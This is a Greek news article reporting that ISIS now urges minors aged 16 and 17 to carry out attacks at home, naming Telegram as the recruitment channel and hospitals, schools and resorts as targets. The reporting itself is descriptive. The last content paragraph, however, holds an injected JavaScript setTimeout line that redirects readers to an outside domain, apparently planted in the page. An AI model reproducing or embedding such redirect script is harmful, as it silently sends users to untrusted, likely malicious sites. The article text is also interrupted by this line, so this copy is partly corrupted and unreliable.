Εντολή ISIS σε ανήλικους τζιχαντιστές: Ανατιναχτείτε στις πατρίδες σας

0
4

 

H νέα εντολή του Ισλαμικού Κράτους προς τους νέους τζιχαντιστές μόνο τρόμο προκαλεί…Το Ισλαμικό Κράτος ζητάει από τα νέα παιδιά που θέλουν να μεταβούν στη Συρία να μην το κάνουν αλλά να ανατιναχθούν εκεί που βρίσκονται!

«Νέοι άνθρωποι δεν καλούνται πλέον να στρατολογηθούν στην Συρία αλλά καλούνται να κάνουν επιθέσεις μέσα στην ίδια τους την χώρα», μεταδίδει η βελγική φλαμανδόφωνη εφημερίδα Het Nieuwsblad.

Σε κόκκινο συναγερμό βρίσκονται οι ευρωπαϊκές αρχές καθώς οι ανήλικοι είναι εκείνοι που επηρεάζονται και πιο εύκολα και μπορούν όχι μόνο να μην κινήσουν υποψίες αλλά και να ριζοσπαστικοποιηθούν τόσο που να κάνουν τις πιο αιματηρές επιθέσεις. Και ακόμα και αν συλληφθούν είναι πιο δύσκολο να επιβληθούν ποινές.

Η στρατολόγηση ανηλίκων τζιχαντιστών γίνεται κυρίως μέσω των social media και ειδικότερα μέσω της εφαρμογής «Telegram».

«Σπείρετε τον θάνατο και την καταστροφή εκεί που είστε», είναι η εντολή που δίνεται στους ανήλικους και αφορά παιδιά κυρίως ηλικίας 16 και 17 ετών.

Όσον αφορά για τους επόμενους στόχους των τζιχαντιστών, σύμφωνα με τις μυστικές υπηρεσίες είναι νοσοκομεία, σχολεία και τουριστικά θέρετρα σε Γαλλία, Ιταλία και Ισπανία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here